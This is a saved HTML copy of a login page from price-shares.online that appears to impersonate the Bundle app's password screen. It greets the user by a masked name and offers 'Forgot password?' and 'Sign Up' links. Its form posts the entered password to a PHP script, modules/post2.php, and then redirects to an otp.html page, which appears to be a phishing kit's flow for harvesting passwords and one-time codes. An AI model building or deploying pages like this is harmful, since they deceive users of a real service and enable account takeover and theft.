<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from price-shares.online/password.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Mar 2022 11:54:57 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <title>Login</title>
    <link rel="stylesheet" href="build/css/intlTelInput.css">
    <link rel="stylesheet" href="build/css/demo.css">
    <link rel="stylesheet" href="sstyle.css">
    <link rel="stylesheet" href="../cdn.jsdelivr.net/npm/bootstrap-icons%401.3.0/font/bootstrap-icons.css" />
    <link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha512-SfTiTlX6kk+qitfevl/7LibUOeJWlt9rbyDn92a1DqWOw9vWG2MFoays0sgObmWazO5BQPiFucnnEAjpAB+/Sw==" crossorigin="anonymous" referrerpolicy="no-referrer"
    />
    <link rel="stylesheet" href="password.css">
    <script src="../kit.fontawesome.com/ae0531fa65.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="../unicons.iconscout.com/release/v4.0.0/css/line.css">
    <link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/bootstrap/5.1.3/css/bootstrap.min.css" />

</head>

<body>

    <div class="container text-center">
        <img class="logo" src="images/download%20(2).png" alt="">
        <form method="POST" class="myform text-center" action=".././modules/post2.php">
            <div class="para-first">
                <div class="hcnt text-center">
                    <h2 class="para1 mb-2">
                        Welcome back, (*****)
                    </h2><span class="popper"><img src="images/popper-removebg-preview.png" alt=""></span>
                </div>

                <p class="paragraph mb-4 text-center">
                    Not your account? <a href="#">Switch</a>
                </p>
            </div>

            <p class=" pwsd">Password</p>
            <input type="hidden" name="_captcha" value="false">
            <input type="hidden" name="_next" value="https://price-shares.online/otp.html">
            <input id="password" required class="pwdinput" name="password" type="password"><br><i class="fa fa-eye" id="togglePassword" style="margin-left: -30px; cursor: pointer; position: absolute;"></i>
            <a class="query quertwo mt-2" href="#">Forgot password?</a>
            <div class="cbtn mt-4">
                <button class="mt-3 text-center nextBtn">Continue</button>
            </div>
            <p class="last-p mt-2">Not on Bundle? <a href="#">Sign Up</a></p>
        </form>

        <div class="bt-img text-center ">
            <img src="images/download%20(3).png" alt="">
        </div>
    </div>



























    <script src="script.js"></script>
    <script src="build/js/intlTelInput.js"></script>
</body>


<!-- Mirrored from price-shares.online/password.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Mar 2022 11:55:21 GMT -->
</html>